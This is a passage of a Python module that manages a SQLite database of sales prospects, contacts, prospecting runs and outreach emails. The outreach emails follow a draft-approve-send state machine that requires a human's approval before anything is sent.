        "INSERT INTO contacts (prospect_id, person_name, role, phone, "
        "phone_normalized, email, form_url, address, notes, created_at) "
        "VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
        (
            prospect_id,
            row["person_name"],
            row["role"],
            row["phone"],
            row["phone_normalized"],
            row["email"],
            row["form_url"],
            row["address"],
            row["notes"],
            stamp,
        ),
    )
    return cur.lastrowid


def _reject_bool_id(value: Any, key: str, producer: str) -> None:
    """`bool` is a subclass of `int`, and True binds to SQLite as 1.

    So an existence check on True found the row with id 1, passed, and the child
    row landed under a parent the caller never named. The same guard already
    protects `distance_miles` and `result_count`.
    """
    if isinstance(value, bool):
        raise ProspectError(
            "%s %r is a bool, not an id -- bool is a subclass of int in "
            "Python, so it would bind to SQLite as %d and attach this row to "
            "whichever row holds that id; pass the integer id %s() returned"
            % (key, value, int(value), producer))


def _require_prospect(conn: sqlite3.Connection, prospect_id: int) -> None:
    """The access layer names the missing parent. The declared foreign key is
    the backstop, not the raise surface -- an IntegrityError names a constraint,
    not the thing the caller has to fix."""
    _reject_bool_id(prospect_id, "prospect_id", "insert_prospect")
    row = conn.execute(
        "SELECT 1 FROM prospects WHERE prospect_id = ?", (prospect_id,)
    ).fetchone()
    if row is None:
        raise ProspectError(
            "no prospect with prospect_id %r -- insert the prospect first "
            "with insert_prospect(), then attach to the id it returns"
            % (prospect_id,))


def _require_contact(conn: sqlite3.Connection, contact_id: int,
                     prospect_id: int) -> None:
    """The contact must EXIST and BELONG to `prospect_id`.

    Existence alone is not enough. The outreach row names the prospect, and the
    approval flow resolves the recipient address from the contact row. A contact
    borrowed from another prospect means Adam reads and approves an email for
    company A while the address it goes to belongs to company B.
    """
    _reject_bool_id(contact_id, "contact_id", "insert_contact")
    row = conn.execute(
        "SELECT prospect_id FROM contacts WHERE contact_id = ?", (contact_id,)
    ).fetchone()
    if row is None:
        raise ProspectError(
            "no contact with contact_id %r -- add the contact first with "
            "insert_contact(), then open the outreach against the id it returns"
            % (contact_id,))
    if row[0] != prospect_id:
        raise ProspectError(
            "contact_id %r belongs to prospect_id %r, not to prospect_id %r -- "
            "an outreach must name the prospect that owns the address it will "
            "be sent to; open it against that prospect, or add the contact to "
            "this one with insert_contact()"
            % (contact_id, row[0], prospect_id))


def insert_contact(prospect_id: int, contact: dict, path: str = DB_PATH) -> int:
    """Attach one more contact to an existing prospect."""
    row = _validate_contact(contact)
    stamp = _now()
    conn = connect(path)
    try:
        with conn:
            _require_prospect(conn, prospect_id)
            return _insert_contact_row(conn, prospect_id, row, stamp)
    finally:
        conn.close()


def update_prospect_status(
    prospect_id: int,
    status: str,
    path: str = DB_PATH,
) -> None:
    """Move a prospect between active/rejected/dead.

    `rejected` is Adam's judgement that the source is not worth pursuing;
    `dead` is the world's -- the company closed, or the event has passed.
    """
    if status not in PROSPECT_STATUSES:
        raise ProspectError(
            "%r is not a prospect status -- use one of %s"
            % (status, "/".join(PROSPECT_STATUSES)))
    conn = connect(path)
    try:
        with conn:
            _require_prospect(conn, prospect_id)
            conn.execute(
                "UPDATE prospects SET status = ?, updated_at = ? "
                "WHERE prospect_id = ?",
                (status, _now(), prospect_id),
            )
    finally:
        conn.close()


def set_favorite(prospect_id: int, is_favorite: bool, path: str = DB_PATH) -> None:
    """Flip a prospect's favorite flag -- the page's ★ on a prospect row.

    Same shape as `sellers_db.set_favorite()`: raises rather than creating
    anything, because a favorite click names a prospect that must already
    exist. Unlike the sellers flag this one changes no score -- it marks the
    sources Adam wants the prospector to keep coming back to.
    """
    if not isinstance(is_favorite, bool):
        raise ProspectError("is_favorite must be a bool, got %r" % (is_favorite,))
    conn = connect(path)
    try:
        with conn:
            _require_prospect(conn, prospect_id)
            conn.execute(
                "UPDATE prospects SET is_favorite = ?, updated_at = ? "
                "WHERE prospect_id = ?",
                (int(is_favorite), _now(), prospect_id),
            )
    finally:
        conn.close()


def is_favorite(prospect_id: int, path: str = DB_PATH) -> bool:
    """Whether one prospect is favorited. False for a row that predates the
    column (NULL via ALTER), same as sellers_db.is_favorite treats a missing
    row."""
    conn = connect(path)
    try:
        row = conn.execute(
            "SELECT is_favorite FROM prospects WHERE prospect_id = ?",
            (prospect_id,),
        ).fetchone()
        return bool(row["is_favorite"]) if row is not None else False
    finally:
        conn.close()


def _require_message_part(value, part: str) -> str:
    """One half of the message Adam approves. Absent or blank is a refusal.

    A blank subject or body would reach `send_outreach.py` as an empty argument
    and put an empty email in front of a prospect over Adam's name.
    """
    if not isinstance(value, str) or not value.strip():
        raise ProspectError(
            "create_outreach needs a non-empty %s, got %r -- Adam approves a "
            "whole message, and send_outreach reads both the subject and the "
            "body from this row rather than from a command line"
            % (part, value))
    return value


def create_outreach(
    prospect_id: int,
    contact_id: int,
    subject: str,
    body: str,
    path: str = DB_PATH,
) -> int:
    """Open a conversation in `draft`. Nothing is sent here.

    `draft -> approved` is Adam's per-action approval gate.

    The subject and the body are BOTH required, and both are stored. Adam
    approves a whole message, so a row that carries only half of one is not
    evidence of what he agreed to. Storing the subject also keeps it out of the
    send command line: `send_outreach.py` reads both from this row.
    """
    subject = _require_message_part(subject, "subject")
    body = _require_message_part(body, "body")
    stamp = _now()
    conn = connect(path)
    try:
        with conn:
            _require_prospect(conn, prospect_id)
            _require_contact(conn, contact_id, prospect_id)
            # Two overlapping runs must not each draft, approve and send to the
            # same person. Only ONE non-terminal conversation may be open at a
            # time. A terminal one is finished, so a later run may open a fresh
            # conversation against the same contact.
            open_states = tuple(sorted(set(OUTREACH_STATES) - _TERMINAL_STATES))
            row = conn.execute(
                "SELECT outreach_id, state FROM outreach"
                " WHERE prospect_id = ? AND contact_id = ?"
                "   AND state IN (%s) ORDER BY outreach_id LIMIT 1"
                % ",".join("?" * len(open_states)),
                (prospect_id, contact_id) + open_states,
            ).fetchone()
            if row is not None:
                raise ProspectError(
                    "outreach %d against contact_id %r is still open in state "
                    "%r -- finish it first (advance it to a terminal state) "
                    "instead of opening a second conversation with the same "
                    "person" % (row[0], contact_id, row[1]))
            cur = conn.execute(
                "INSERT INTO outreach (prospect_id, contact_id, state, outcome, "
                "subject, body, note, created_at, updated_at) "
                "VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)",
                (prospect_id, contact_id, "draft", None, subject, body, None,
                 stamp, stamp),
            )
            return cur.lastrowid
    finally:
        conn.close()


def advance_outreach(
    outreach_id: int,
    new_state: str,
    outcome: str | None = None,
    note: str | None = None,
    sent_message_id: str | None = None,
    path: str = DB_PATH,
) -> None:
    """Move one outreach row along TRANSITIONS.

    The transition is checked BEFORE the outcome rule, so an illegal advance
    that happens to target `closed` reports the illegal transition -- the thing
    the caller got wrong -- rather than the outcome it supplied correctly.
    """
    conn = connect(path)
    try:
        with conn:
            row = conn.execute(
                "SELECT state, note FROM outreach WHERE outreach_id = ?",
                (outreach_id,)
            ).fetchone()
            if row is None:
                raise ProspectError(
                    "no outreach with outreach_id %r -- open one with "
                    "create_outreach() before advancing it" % (outreach_id,))
            current, stored_note = row[0], row[1]
            legal = TRANSITIONS[current]
            if new_state not in legal:
                if legal:
                    raise IllegalTransition(
                        "outreach %d is %r; %r is not a legal next state -- "
                        "advance to one of %s instead"
                        % (outreach_id, current, new_state, "/".join(legal)))
                raise IllegalTransition(
                    "outreach %d is %r, a terminal state with no legal next "
                    "state -- open a new outreach with create_outreach() "
                    "instead of reopening this one"
                    % (outreach_id, current))

            if new_state == "closed":
                if outcome is None:
                    raise ProspectError(
                        "closing outreach %d needs an outcome -- pass one of %s "
                        "so a closed conversation records what actually "
                        "happened" % (outreach_id, "/".join(OUTCOMES)))
                if outcome not in OUTCOMES:
                    raise ProspectError(
                        "%r is not an outreach outcome -- pass one of %s"
                        % (outcome, "/".join(OUTCOMES)))
            elif outcome is not None:
                raise ProspectError(
                    "outreach %d cannot carry an outcome while advancing to "
                    "%r -- an outcome (%s) belongs only to the `closed` state; "
                    "drop it or close the conversation"
                    % (outreach_id, new_state, "/".join(OUTCOMES)))

            # `sent` is the ONE state that leaves a trace outside this database,
            # so it must carry the receipt for that trace. Without it an approved
            # row whose send completed and one whose send never ran are
            # identical, and `approved -> sent` stays legal, so a recovery pass
            # after an interrupted run can send the same email twice.
            if new_state == "sent":
                if not isinstance(sent_message_id, str) or not sent_message_id.strip():
                    raise ProspectError(
                        "advancing outreach %d to `sent` needs sent_message_id "
                        "-- pass the id the send returned, so an interrupted run "
                        "can tell a delivered message from an approved one and "
                        "never sends it twice" % (outreach_id,))
            elif sent_message_id is not None:
                raise ProspectError(
                    "outreach %d cannot carry a sent_message_id while advancing "
                    "to %r -- a receipt belongs only to the `sent` state"
                    % (outreach_id, new_state))

            # The note is APPENDED, never replaced. draft->approved carries
            # Adam's per-action approval, and every later advance has to leave
            # that record standing. Writing `note` straight through would NULL
            # the stored note on any advance that omits one.
            if note is None:
                merged_note = stored_note
            elif stored_note is None:
                merged_note = note
            else:
                merged_note = stored_note + "\n" + note

            conn.execute(
                "UPDATE outreach SET state = ?, outcome = ?, note = ?, "
                "sent_message_id = ?, updated_at = ? WHERE outreach_id = ?",
                (new_state, outcome, merged_note, sent_message_id, _now(),
                 outreach_id),
            )
    finally:
        conn.close()


def record_run(
    run_key: str,
    hypothesis_type: str,
    searches: list[str],
    result_count: int,
    notes: str | None = None,
    path: str = DB_PATH,
) -> int:
    """Log one hypothesis exploration, INCLUDING one that found nothing.

    A zero-result run is the point: it is what stops the next run repeating the
    same dead end.
    """
    # `run_key` is the attribution. The column is NOT NULL and
    # idx_prospect_runs_key indexes it, so an empty, whitespace or non-string
    # key produces a record nothing can trace back to a run -- and None reached
    # the driver as a bare IntegrityError naming a constraint instead of the
    # thing the caller has to fix.
    run_key_text = _require_text_value(
        run_key, "run_key", "prospect_run", _RUN_KEY_REMEDY)

    _require_registered_type(hypothesis_type)
    key = hypothesis_types.type_key(hypothesis_type)

    if not isinstance(searches, list) or not searches:
        raise ProspectError(
            "searches must be a non-empty list of the queries actually run, "
            "got %r -- an exploration nobody can reproduce is not a record"
            % (searches,))
    for item in searches:
        if not isinstance(item, str) or not item.strip():
            raise ProspectError(
                "searches must hold query strings, got %r in %r -- record the "
                "text of each search" % (item, searches))

    if isinstance(result_count, bool) or not isinstance(result_count, int):
        raise ProspectError(
            "result_count must be an int, got %r -- count the prospects this "
            "exploration produced" % (result_count,))
    if result_count < 0:
        raise ProspectError(
            "result_count %r is negative -- zero is the floor, and zero-result "
            "explorations are recorded on purpose" % (result_count,))

    conn = connect(path)
    try:
        with conn:
            cur = conn.execute(
                "INSERT INTO prospect_runs (run_key, hypothesis_type, searches, "
                "result_count, notes, recorded_at) VALUES (?, ?, ?, ?, ?, ?)",
                (run_key_text, key, json.dumps(searches), result_count, notes,
                 _now()),
            )
            return cur.lastrowid
    finally:
        conn.close()


def expire_events(path: str = DB_PATH) -> int:
    """Kill active prospects whose event date has passed. Returns the count.

    ISO date strings compare lexicographically, so this is one UPDATE. A
    prospect already `rejected` or `dead` is left alone -- its status records a
    decision, and expiry must not overwrite one.
    """
    conn = connect(path)
    try:
        with conn:
            cur = conn.execute(
                "UPDATE prospects SET status = 'dead', updated_at = ? "
                " WHERE status = 'active'"
                "   AND event_date IS NOT NULL"
                "   AND event_date < ?",
                (_now(), _today()),
            )
            return cur.rowcount
    finally:
        conn.close()


# --- reads -----------------------------------------------------------------

# Every read below runs through these two, so no caller outside this module
# writes SQL against the prospect tables. That matters because this module owns
# _SCHEMA: the column names a query uses and the column names the DDL creates
# have to be read from the same file, or a command module invents columns the
# database never had.
def _rows(sql: str, params: tuple = (), path: str = DB_PATH) -> list[dict]:
    conn = connect(path)
    try:
        return [dict(r) for r in conn.execute(sql, params)]
    finally:
        conn.close()


def _one(sql: str, params: tuple, path: str = DB_PATH) -> dict | None:
    rows = _rows(sql, params, path)
    return rows[0] if rows else None


# The display read. `contact_count` and `latest_outreach_state` are correlated
# subqueries rather than joins, so one prospect stays one row.
_LIST_SQL = """
SELECT p.*,
       (SELECT count(*) FROM contacts c WHERE c.prospect_id = p.prospect_id)
           AS contact_count,
       (SELECT o.state FROM outreach o WHERE o.prospect_id = p.prospect_id
         ORDER BY o.outreach_id DESC LIMIT 1) AS latest_outreach_state
  FROM prospects p
"""


def list_prospects(status: str | None = None, path: str = DB_PATH) -> list[dict]:
    """Prospects newest first, optionally filtered by status."""
    conn = ledger_db.connect_readonly(path)
    try:
        if status is None:
            rows = conn.execute(_LIST_SQL + " ORDER BY p.created_at DESC")
        else:
            if status not in PROSPECT_STATUSES:
                raise ProspectError(
                    "%r is not a prospect status -- filter on one of %s"
                    % (status, "/".join(PROSPECT_STATUSES)))
            rows = conn.execute(
                _LIST_SQL + " WHERE p.status = ? ORDER BY p.created_at DESC",
                (status,),
            )
        return [dict(r) for r in rows]
    finally:
        conn.close()


def get_prospect(prospect_id: int, path: str = DB_PATH) -> dict | None:
    """One prospect with its contacts and its outreach history, or None."""
    conn = connect(path)
    try:
        row = conn.execute(
            "SELECT * FROM prospects WHERE prospect_id = ?", (prospect_id,)
        ).fetchone()
        if row is None:
            return None
        out = dict(row)
        out["contacts"] = [
            dict(r) for r in conn.execute(
                "SELECT * FROM contacts WHERE prospect_id = ? ORDER BY contact_id",
                (prospect_id,),
            )
        ]
        out["outreach"] = [
            dict(r) for r in conn.execute(
                "SELECT * FROM outreach WHERE prospect_id = ? ORDER BY outreach_id",
                (prospect_id,),
            )
        ]
        return out
    finally:
        conn.close()


def list_contacts(path: str = DB_PATH) -> list[dict]:
    """Every contact, grouped under its prospect."""
    return _rows("SELECT * FROM contacts ORDER BY prospect_id, %s"
                 % PRIMARY_KEYS["contacts"], (), path)


def list_outreach(path: str = DB_PATH) -> list[dict]:
    """Every outreach row, oldest first, so the conversation reads in order."""
    return _rows("SELECT * FROM outreach ORDER BY %s"
                 % PRIMARY_KEYS["outreach"], (), path)


def list_runs(path: str = DB_PATH) -> list[dict]:
    """Every prospecting run, newest first."""
    return _rows("SELECT * FROM prospect_runs ORDER BY %s DESC"
                 % PRIMARY_KEYS["prospect_runs"], (), path)


def run_row(run_id: int, path: str = DB_PATH) -> dict | None:
    """One prospecting run, or None."""
    return _one("SELECT * FROM prospect_runs WHERE %s = ?"
                % PRIMARY_KEYS["prospect_runs"], (run_id,), path)


def outreach_row(outreach_id: int, path: str = DB_PATH) -> dict | None:
    """One outreach row, or None. `send_outreach.py` reads the recipient's
    message from here rather than from its caller."""
    return _one("SELECT * FROM outreach WHERE %s = ?"
                % PRIMARY_KEYS["outreach"], (outreach_id,), path)


def contact_row(contact_id: int, path: str = DB_PATH) -> dict | None:
    """One contact row, or None. This is where a send reads the address, so no
    caller has to carry it."""
    return _one("SELECT * FROM contacts WHERE %s = ?"
                % PRIMARY_KEYS["contacts"], (contact_id,), path)


def summary(path: str = DB_PATH) -> dict[str, Any]:
    """Counts by prospect status and outreach state, plus the run count."""
    conn = connect(path)
    try:
        return {
            "prospects": {
                r["status"]: r["n"] for r in conn.execute(
                    "SELECT status, count(*) AS n FROM prospects "
                    "GROUP BY status ORDER BY status")
            },
            "outreach": {
                r["state"]: r["n"] for r in conn.execute(
                    "SELECT state, count(*) AS n FROM outreach "
                    "GROUP BY state ORDER BY state")
            },
            "prospect_runs": conn.execute(
                "SELECT count(*) FROM prospect_runs").fetchone()[0],
        }
    finally:
        conn.close()


def main() -> int:
    import argparse

    ap = argparse.ArgumentParser(
        description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
    ap.add_argument("prospect_id", nargs="?",
                    help="report one prospect instead of the ledger summary")
    a = ap.parse_args()
    if not a.prospect_id:
        print(json.dumps(summary(), indent=1))
        return 0
    try:
        prospect_id = int(a.prospect_id)
    except ValueError:
        sys.exit("prospects_db: %r is not a prospect_id" % a.prospect_id)
    row = get_prospect(prospect_id)
    if row is None:
        sys.exit("prospects_db: no prospect %r" % a.prospect_id)
    print(json.dumps(row, indent=1, default=str))
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
